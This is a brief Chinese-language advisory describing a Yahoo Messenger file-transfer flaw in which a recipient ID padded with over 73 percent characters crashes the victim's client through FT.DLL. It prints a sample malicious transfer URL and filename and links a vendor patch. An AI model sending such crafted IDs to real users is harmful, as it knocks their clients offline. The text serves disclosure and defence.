詳細描述:
Yahoo messenger中的文件傳輸選項漏洞能讓遠程攻擊者關(guān)閉受害人的yahoo messenger客戶端。
Yahoo messenger能過濾掉yahooID中的一些特別字符(象&,?),當(dāng)攻擊者發(fā)送一個文件到 “受害人的ID%%%%%%%%%(超過73個字符)”時,服務(wù)器端過濾掉%字符署名“受害者ID”并打開一個文件傳輸會話,如果受害人接受了這個文件,他的客戶端就會提示存取出錯并關(guān)閉,出錯的原因是負責(zé)yahoo messenger P2P文件傳輸中的一個FT.DLL文件造成的。
攻擊者發(fā)送給受害者機器的樣本地址:
http://10.10.10.1:81/Messenger.victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25.1066206307331File.txt?AppID=Messenger&UserID=victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25&K=lc9ly5954h9doeawsg31h9tgta6c7dtod8bqxrt2vykgw5e5j9dao0o9 doeawsg31h9t8vey6uq19
6y 14 53
Messenger.vicitimid%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.1066377306549File.TXT
補?。?http://cn.messenger.yahoo.com/
